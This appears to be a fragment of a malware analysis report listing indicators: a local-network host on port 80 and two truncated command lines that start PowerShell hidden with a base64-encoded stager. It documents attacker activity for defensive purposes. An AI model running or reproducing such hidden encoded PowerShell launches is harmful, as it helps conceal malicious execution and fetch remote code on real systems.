Technical Information
- '<LOCALNET>.0.130':80
- '%WINDIR%\syswow64\cmd.exe' /C START /B powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAUwBJAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAFIAcwBpAE8AbgAuAE0AQQBKAG8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBzA...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C START /B powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAUwBJAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAFIAcwBpAE8AbgAuAE0AQQBKAG8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBzA...